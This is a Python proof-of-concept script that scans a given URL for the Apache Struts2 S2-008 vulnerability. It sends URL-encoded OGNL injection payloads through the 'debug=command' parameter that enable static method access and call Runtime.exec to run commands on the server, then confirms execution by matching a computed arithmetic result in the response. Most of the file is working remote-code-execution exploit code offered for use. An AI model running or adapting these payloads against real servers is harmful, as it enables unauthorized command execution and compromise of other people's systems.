38 lines
2.0 KiB
Python
38 lines
2.0 KiB
Python
import warnings
|
|
import requests
|
|
import random
|
|
|
|
warnings.filterwarnings("ignore")
|
|
|
|
|
|
def poc(url, **kwargs):
|
|
if kwargs.get('ip'):
|
|
url = 'http://' + kwargs.get('ip') + ':' + kwargs.get('port')
|
|
else:
|
|
url = url
|
|
timeout = 10
|
|
proxies = {'http': '127.0.0.1:9999'}
|
|
ran_a = random.randint(10000000, 20000000)
|
|
ran_b = random.randint(1000000, 2000000)
|
|
ran_check = ran_a - ran_b
|
|
check = [ran_check, '无法初始化设备 PRN', '??????? PRN','Unable to initialize device PRN']
|
|
lin = 'expr' + ' ' + str(ran_a) + ' - ' + str(ran_b)
|
|
poc_goop = [
|
|
r"?debug=command&expression=(%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23foo%3Dnew%20java.lang.Boolean%28%22false%22%29%20%2C%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3D%23foo%2C@org.apache.commons.io.IOUtils@toString%28@java.lang.Runtime@getRuntime%28%29.exec%28%27print goop%27%29.getInputStream%28%29%29)",
|
|
r"?debug=command&expression=(%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23foo%3Dnew%20java.lang.Boolean%28%22false%22%29%20%2C%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3D%23foo%2C@org.apache.commons.io.IOUtils@toString%28@java.lang.Runtime@getRuntime%28%29.exec%28%27" + lin + r"%27%29.getInputStream%28%29%29)",
|
|
]
|
|
headers = {
|
|
"Accept": "application/x-shockwave-flash, image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*",
|
|
"User-Agent": 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0',
|
|
"Content-Type": "application/x-www-form-urlencoded"
|
|
}
|
|
try:
|
|
for test in poc_goop:
|
|
req = requests.get(url + test, headers=headers, timeout=timeout, verify=False,)
|
|
result = "目标存在 Struts2-008, check url: %s" % url
|
|
for c in check:
|
|
if str(c) in req.text:
|
|
return result
|
|
except:
|
|
pass
|